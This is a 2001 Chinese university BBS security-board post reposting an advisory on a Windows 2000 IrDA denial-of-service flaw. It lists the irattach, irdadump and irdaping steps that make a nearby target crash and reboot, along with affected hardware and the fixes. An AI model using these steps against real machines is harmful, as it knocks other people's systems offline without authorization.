荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]


发信人: michaelx (水并不是这样灌的), 信区: Security
标  题: Win2k IrDA 拒绝服务漏洞利用分析
发信站: 荔园晨风BBS站 (Sat Oct 27 12:15:45 2001), 转信

Win2k IrDA 拒绝服务漏洞利用分析 (MS,缺陷)
涉及程序:
Win2k IrDA
描述:
Win2k IrDA 拒绝服务漏洞利用分析
详细:
发现 Win2k IrDA 端口存在漏洞,攻击者利用此漏洞能导致受影响服务器蓝屏并在稍后
自动重启。
1、测试环境为目标机运行 Windows,攻击机运行 Linux ( 内核要支持 IrDA )
2、确认 Linux 下 irda-utils-0.9.10-9 已经安装
3、激活 IrDA 端口:irattach /dev/ttyS1 -s
4、确认工作正常:irdadump,这将会产生如下输出:
07:28:17.790903 xid:cmd 4d274896 > ffffffff S=6 s=0 (14)
07:28:17.880849 xid:cmd 4d274896 > ffffffff S=6 s=1 (14)
07:28:17.970845 xid:cmd 4d274896 > ffffffff S=6 s=2 (14)
07:28:18.060858 xid:cmd 4d274896 > ffffffff S=6 s=3 (14)
07:28:18.150840 xid:cmd 4d274896 > ffffffff S=6 s=4 (14)
07:28:18.240861 xid:cmd 4d274896 > ffffffff S=6 s=5 (14)
07:28:18.330859 xid:cmd 4d274896 > ffffffff S=6 s=* rattusrattus hint=0400 [
 Computer ] (28)
5、将目标机红外线端口与攻击机在有效距离内对应。
6、运行 irdaping,要求有最终地址(上面的例子是"0x4d274896" )
7、目标机会出现蓝屏并自动重启
受影响系统:
[] OEM laptop, Windows 2000 Professional service pack 2 v5.00.2195,
   National Semiconductor IrDA.
   Options:
     Infrared Trans. A: HP HSDL-1100/2100,
     Infrared Trans. B SIR Transceiver,
     Max Con. Rate: 4Mbps.
   Driver National Semiconductor 9/8/1999 v1.0.0.0 (signed MS 2000
   Publisher)
[] Toshiba Satellite Pro 4000, Windows 2000 Professional service pack 2
   v5.00.2195, SMC IrCC IrDA.
   Options:
     Fast Infrared Port: Infrared
     Transceiver Type: auto,
     Min. Turn-Around Time: 1.0mS,
     Speed Limit: 4 Mbps,
   Driver: SMC 22/10/2000 v4.10.1999.5 (signed MS comp).
[] Acer TravelMate 527TE P3-700MHz, Windows 2000 Professional
不受影响系统:
[] Dell Inspiron 3200 D233XT TS30H, Windows 98 SE 4.10.1998 32Mb P2,
   IrDA driver (Microsoft 5-11-1998)
      [Thanks Jen!]
[] IBM ThinkPad T21, Windows 98 SE 4.10.2222 A 128Mb P3, IrDA driver
   (Microsoft 4-23-1999)
注意:漏洞相关信息请参考:http://www.cnns.net/article/db/1780.htm
解决方案:
1、临时解决方法:在设备管理器中禁止 IrDA 端口
2、下载安装补丁:http://www.cnns.net/article/db/1780.htm
发布时间:2001年8月22日

--
M.X的FTP SERVER
有好多好野down.有过百兆的DELPHI编程资料!还有很多其他FTP无的软件。
不信就进来看看罗!
ftp://192.168.28.123
到网络安全版来玩罗,michaelx随时欢迎你!

※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 203.93.19.1]


[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店